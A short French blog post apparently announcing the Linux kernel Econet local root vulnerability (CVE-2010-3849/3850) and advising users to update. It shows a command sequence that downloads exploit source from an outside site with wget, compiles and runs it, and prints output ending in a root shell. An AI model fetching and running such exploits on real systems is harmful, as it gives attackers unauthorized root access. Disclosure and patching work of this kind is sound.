Une nouvelle faille de sécurité vient d'être découverte dans le noyau Linux. L'exploit permet ainsi à un simple utilisateur de passer root sur une machine. La vulnérabilité affecte les distributions Linux basées sur des versions inférieures à la 2.6.37 du kernel.
Le seul moyen de contrer cette attaque est de mettre à jour votre système. Voici un exemple d'utilisation de l'exploit..
$ wget www.t9ahwija.net/docs/nelson.c
$ gcc -o nelson nelson.c
$ ./nelson
[*] Resolving kernel addresses...
[+] Resolved econet_ioctl to 0xf80f02a0
[+] Resolved econet_ops to 0xf80f03a0
[+] Resolved commit_creds to 0xc016c830
[+] Resolved prepare_kernel_cred to 0xc016cc80
[*] Calculating target...
[*] Triggering payload...
[*] Got root!
# id
uid=0(root) gid=0(root) groupes=0(root)
PS. Ne concerne donc pas Slackware et Debian (le symbole résolu n'existe pas sous ces distributions)
il ne concerne pas Red Hat car cette distribution ne supporte pas Econet par défaut.
il ne concerne pas les Ubuntu et Debian qui ont été mises à jour (CVE-2010-3849 et CVE-2010-3850).
Ajouter un Commentaire
